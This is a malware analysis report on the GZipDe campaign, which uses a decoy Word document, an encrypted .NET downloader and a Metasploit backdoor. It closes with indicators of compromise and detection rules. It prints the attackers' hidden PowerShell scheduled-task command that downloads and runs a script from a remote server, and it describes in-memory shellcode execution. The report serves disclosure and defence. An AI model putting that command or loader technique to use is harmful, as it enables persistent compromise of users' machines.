GZipDe: An Encrypted Downloader Serving Metasploit

8
[ This article was originally published here ]

At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy:

This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.

Malicious Document

The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc).  When opened, it executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console:

‘C:WindowsSystem32schtasks.exe’ /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR ‘Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://118.193.251[.]137/dropbox/?p=BT67HU78HZ’,’$env:publicsvchost325.vbs’);(New-Object -com Shell.Application).ShellExecute(‘$env:publicsvchost325.vbs’);’ /F

Leveraging an HTTP request, it resolves to the following URL:

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

We are missing the next step of the infection chain as the server is now offline.

Based on the common path we believe this file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.

GZipDe – The Encrypted Downloader

The internal name of this malware is Gzipde, as specified by the path it was built on the attacker’s machine:

DocumentsVisual Studio 2008ProjectsgzipdegzipdeobjDebuggzipde.pdb

We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional layer of encryption payload to that version. It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection.

The key is described as an array of bytes, with the values:

After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes.

The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a new thread to execute it.

The script uses WaitForSingleObject C# class, meaning that the program accesses a mutex object. A special handler controls the access of the process to system resources. This prevents multiple instances of the same malware to run at a time, unnecessarily increasing resource  usage and producing more network noise.

The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload:

Metasploit is becoming a popular choice with targeted attacks.

The Metasploit payload

The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.

This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information into the disk. This operation is called Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network.

Thanks to Chris Doman and Jaime Blasco for collaboration.

Appendix

File-Hashes

https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28

https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c

https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711

 

IP Addresses

118.193.251[.]137

175.194.42[.]8

URLs

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

Network Detection

Multi-purpose:

AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)

ET ATTACK_RESPONSE Metasploit/Meterpreter – Sending metsrv.dll to Compromised Host

ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate

Dedicated:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”AV TROJAN GZipDe MacroMalware CnC Checkin”; flow:established,to_server; content:”/dropbox/?p=”; http_uri; depth:12; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; pcre:”^//dropbox/?p=[a-zA-Z0-9]*$/U”; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”AV TROJAN GZipDe MacroMalware Payload Request”; flow:established,to_server; content:”/dropbox/file”; depth:13; http_uri; content:”.exe”; http_uri; distance:0; isdataat:!1,relative; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

Unified Security Management (USM) Correlation Rules

  • System Compromise – Code Execution – Powershell Process Created by Office Word
  • Delivery & Attack – Suspicious Download – File Download via Office Macro
  • Environmental Awareness – Code Execution – Suspicious PowerShell Arguments

OTX Pulse

Yara Rule

rule gzipde_hunt {

meta:

author = “AlienVault Labs”

description = “Hunt rule to identify files related to Gzipde”

copyright = “Alienvault Inc. 2018”

reference = “https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05”

strings:

$a = “118.193.251.137” nocase wide ascii

$b = “BT67HU78HZ” nocase wide ascii

$c = “2E0EB747-BE46-441A-A8B1-97AB27B49EC5” nocase wide ascii

$d = “gzipde.pdb” nocase wide ascii

$e = “C:UsersjhonDocumentsVisual Studio 2008” nocase wide ascii

condition:

any of them

}

import “dotnet”

rule MeterpreterEncryptedPayloadDotNetGzipDE {

meta:

type = “malware”

description = “GZipDe”

author = “jblasco@alienvault.com”

reference1 = “https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp/blob/master/NativePayload_Reverse_tcp.cs”

reference2= “https://otx.alienvault.com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef”

strings:

$pdb = “gzipde.pdb”

$st1 = “PAGE_EXECUTE_READWRITE”

$st2 = “EncryptInitalize”

$st3 = “EncryptOutput”

$st4 = “CreateThread”

$st5 = “VirtualAlloc”

condition:

uint16(0) == 0x5A4D and

((dotnet.typelib == “c1181bc0-0102-44e9-82ba-7c1ca7d24219” and

dotnet.guids[0] == “2e0eb747-be46-441a-a8b1-97ab27b49ec5”) or

$pdb or

(dotnet.number_of_modulerefs == 1 and

dotnet.modulerefs[0] == “kernel32” and

all of ($st*)))

}